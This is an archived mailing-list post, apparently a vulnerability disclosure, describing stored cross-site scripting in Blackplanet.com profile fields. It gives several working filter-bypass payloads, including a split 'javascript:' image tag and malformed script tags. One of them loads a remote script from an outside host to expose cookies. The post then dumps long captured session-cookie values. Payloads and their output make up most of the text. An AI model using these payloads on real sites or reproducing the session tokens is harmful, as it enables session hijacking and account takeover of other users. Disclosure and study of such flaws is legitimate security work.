<<< Date Index >>>     <<< Thread Index >>>

Blackplanet.com - XSS & cookie disclosure vuln.



Blackplanet.com

Homepage:
http://www.blackplanet.com

Effected files:
input boxes of editing your profile.

Bypassing blackplanet.com's filters wasn't very hard, they even give alistof 
acceptable html tags. Some of which 

included: div, base, bgsound, body, br, embed, img and others. 

The list of allowedhtml tags is here:

http://www.blackplanet.com/help/describe_html_level_popup.html?html_level=50 


My first attempt was a <img> tag and below are several ways to create our XSS 
example. For this first one, make sure 

tab is on and tab jav ascript:

[IMG SRC="jav   ascript:alert('XSS');"]

Screenshots:
http://www.youfucktard.com/xsp/bp1.jpg
http://www.youfucktard.com/xsp/bp2.jpg

-------------------------

Here we are using extraneous open brackets to bypass the filter of the 
disallowed tags <script>:

<<<SCRIPT>alert("XSS");//<</SCRIPT>

Screenshots:

http://www.youfucktard.com/xsp/blackp3.jpg
http://www.youfucktard.com/xsp/blackp4.jpg

----------------------------

Using the same example above, now to reveal our cookie data and OMG this cookie 
is huge!:

<<<<SCRIPT SRC=http://ha.ckers.org/xss.js><</SCRIPT>

Screenshots:
http://www.youfucktard.com/xsp/blackp5.jpg
http://www.youfucktard.com/xsp/blackp6.jpg

If I were toscroll down further you would see the cookie even goes down there! 
Heres the whole thing cut and pasted:

This is remote text via xss.js located at ha.ckers.org CP=null*; 
user_session=09debbe7384762ba06bed4518ca44547d1b6b930-3745-FT41BxYIw4g%3D-Bp9z2S9CCgDykaoD2E3KySJHEma3H722rbhB%2FfVyBSWw25VyfO070qhSLqh%2FROfkj8XcUfDUJyixibp7nFWYCNFtLY7Fs3yet%2B1cFaP319XAw998Xj3LFPH352JxbWKuNuKH4O4vkosEdYVlPfpWwvkvV5T5wRFu8wrDr6i2V%2BHf8wizsIqneVJF6I7zmf7yCwUxI%2F74pEUXk8Ag%2By2fbmhJLnUDUdkpKP85hSEJaluXkVRRullzAdmG30u0xNS3jx6tKa1lOldJGQ8%2F6UOkN3zaQdVBI8VPx6%2Fj4HJlv9hSm6ZUdooVxXe4A930PDJEViGWaHZMPodJUa2r2H1C5%2Fk4l%2F0rVHumYEd06ys6pOaHD0JMCVp3pgAZ%2FaVBG7wQ0xw1Nn388FQtC%2FHbd%2B195uIjapAVaoars10I3NA1NGjaUnUTk5bUhs3I5bpVuk9w0S0KlBbzO0wEhbQ7GcqntQGQG86czsC08%2BFz3lyPGynFDOkgiYfjyaukLGSChB%2BA8oX6yb047ilQOnuN15bZXJUBVVsA4t6l%2BTEUL5c8bwANnZMY85Xdm2mTsBTEn0ohVJqE5vB3KsH%2BLluNZe8VOx34pOYSoXHIsXjfHS1VDtZX0lj4lp58a0Bn%2FGjhtcAFmeut99HfJfxEHqRQUq6L448AHeDvM07O%2BHF0I11WbkR1BakrP2FqjjfJT42FQm7mzWRGw3i4CMSNNJSe0ZQTueBDISA86rbjt8f8iLpts0PNA5A2Fjf222Bj8hINQdPTJ7GAXWX9HVifw4rpYIc0TxTSOYlb3wqvnpJsZ5wm09uRg
 
5Iq8CegPsI6SDtHguWsVFIJxSnQseUWgBB2Ffxdi4XqKvblVX0iISq5zL6NTgKxYtqBns%2Fp0BNfZoQ7zcSA5G2Te0T0U9yF4gHjikMg85o79OQJk%2BY5bDR2czIOeBfML8heHi7LjJ192CLwvfJPvnr%2FTxngD3BnsLWnGqg8%2FWk%2Bj9iOMvsGap1%2BPCTMXFGekArvm67VawC1HwjFsNSZxVKQct23MmAoBEfbe49bE1DoSKxnZ3Xb2uncIQ4nD1EM%2Bk7WoI5JL9weRvA2D99HP0jm7mFV%2Fdb2wqgXX0gNjHvUVUu%2BEiKUuoZajbRgNPfaFS4qg%2FrgTVrGeDUYRDcXGeO8vTCwmJL5Fb2eMyAHrfnddWPcTHGhophW1WOciLQyjtsuaofWeVyOje9q13TCEcyaR23liIZ9npPX9xqrRkL8mg0pYAGf%2FjLomHMudVP%2BqmQ1H7PONnnddtRpRxWqVtPnJI6ZjVlYOn8cPeKtbksmJncSpY3wdH2h8zZMyoNLJekVm2ZQ1zNeycfmjytAI1j;
 
ads_session=667cf3b62081116a981955041ccb3e0de279dd96-498-xFpEhAqQwl4%3D-QABXjDDBlYf%2BdzX1lIfiDn5wS9cQSA85zzVHxKsmHh5sHhhP9WmjmVaTutX9bxsoB4bZ6lA85wiF2I8%2BCoJwJFN02GS4SRLa3qssYSk1PSjKhHHvXOMPaFrMewVpserex4xd1EoutRKSWjLQMLee2yIOcEi4FwMlwk5Jm2y0IleZZXfeJ3XSRe9UEfJspR8naEg9VG9JMug5%2Bt1QY9oH7qEl6VlliWfhX5gIpA%2BsQFx2tapvMR6rPuK7I3z2w3HRsnf%2BtNqmqPmuYVpXvIO4rp8Ka5rcazOkOhmAb43ypQmuKuHfAfWFxeAEaD2

TjZkhrLp9xeTudF4OLn6t%2BTWxsnC1kY7sTJs%3D; 
jb_session=2e915e5c518f7b117b483bfe3328a63aec581681-4195-Ohd5

Eic2jus%3D-7ReNlr3fxxd23LQ0f2UFYy7hT6NN%2FDxVdQR4sX2xUblU%2FQ56zYZgTyNs8zzFrk8ypVtDTdAqDuf0EoTFhoAB6

tJNxc%2B0jl6%2FH4kbjo70T%2FRSLtrwDaAgIuBlDN2RHbq9CGT2JU7MCWansv8TG2sUifpebrT%2Bn9EQD%2BwHPtmRq9

hS1SZ6oJtmApkVIMhg0sGdfvanZaCDDXbn%2FZTunVwwh6bvy%2B1Du%2FumeV09GvdGHWvBnvFLNZfI0W%2Fkdk3Kzn%

2F9EfntLKm6wXNCSbQtoQRqudhbasGzCTL%2Buo9T6ALOUpXSco2nhW8WDPjmLCsKFBBVafH5I8XMgqwhjOJqv9WYt37

aZnzkIqRS12pv9QfZoIORxGBNInp5PYoBE%2FmBMxg5lV%2BBOLgQPvmBzPOW8WB3ntP30sWTcItA29s%2

BQtlBZvnHPIvsbGEXBSytYAYrijXbiu91mI9gGkUDtopybWfN4fpgSdpwAsGg2BdXbdjRpLUAIs6ukq%2FZduxS8QVqEuU7

QSN6GLDPiqHkJMLi8AIjsC5fASDrCSlk4FwSy7xuGmBEbhEqJcyo9e0RhUFlnuvWLxF%2BjBQNHsItuQxFoXsqheZ68zrOsM

%2F%2FHGXSRAyk3nv3nSdOK02z3jOhZvhgH%2Fcxn3btl1O5PZ2xgMpyo9b9NGaVERDqWEa%2FysG9EGLma7

LsIFqsexuqeOs%2BkCpbDhQWdCIgV04vkz6EzjFHWQyXZcefnZMRBs5%2BCj5OM4kldvrYPznVIp09FEEbPG%2F9w%2Bfm3c

7n1inOhve1lDD8kbqdMB674oX6p8uJGxNtRMBPo4%2FLsj0Yr2iZL2pRu0PyI6s6JCydIRvDvFLrPCKFLsQPkUguqUKTLG4

poSumO3ELl597nAV6%2FdR1o1bnSty8M1M%2BGjQk7nQon7yf4H9VIvE6Uh7bQ%2FF%2FMTQJStNkw%2Be2%2FrikcMvWe

0Z91OlPDWZ5I9rTizkkED8P8lc%2BJ%2FaWs2jhgHTU7ZHsl%2BKBjRwXt5Sj71bCMlVWD7q7vVCnr8Gulz%2BznlYLo7TE3

dpeofK3Pj5u9DBOONsU8QV%2B%2B18c6zhtCuLoiQutSAPT2%2FcqbY7Wasj03qspiYwvkhDJ9Ex43xk8OcsxcM2

JEEweHcyHOXnj%2FASSDt3iJlsztTdaDuafpON%2FhM9%2BshyM%2BuMnTcWQfhRYn4Uf8NZO2PL4xmf6PgdNBThwSeX%

2BnTahPKfgPfUZaNYGEpVqSezzbPxXWck%3D; 
al_session=45c785b4e8aab0915123c7ec4f6c97fb2c220454-1361-

ynYOQkoacpk%3D-ekkHZhJFQOi8Dzk%2BDGYylCTo7Bl7LVxLyO3Ek%2FfluSUCMeA5IWNrxezMrrw8r9rjnQHeu3uI7Uh9D%2F2v16Pmi6THOKRBmPR6r9aRK%2BnQ3jGIT%2BU0hhtVp3%2FAUi4UZOeFkoXlnL3m90W3nPjVCfrqTmMTTBMuu5p5DTbmcVp7mWgpj70BVsm7USVgbjpOpFhHMsmAQIS%2FjGhm%2Bgi5kH7s2FYZj3VtdStmIpw7q5jeqwnOR72ySKefFiJQsMUTqT0k1%2FG9FuvyTQrpDgN78KKprok2TYWCBJZIBHQj62I11nqTrefFw41tmFDDLMrnu4ka18wZykVrsX37S4ls77WD9pfdhAX3QK8mr5fmLvKIt%2BgURp1sXiT2Bh6qmmxOOhi0B2B5V3A0D7w7JvTVjbUi8fmyjaCbpIkWyKk3xM8Ug%3D%3D
 

Wenotice the cookie above tracks for:

user_session
ads_session
jb_sessional_session.

Well, there you have it, a few ways to bypass blackplanets.com filters tocreate 
aXSS vuln and even disclose cookie data.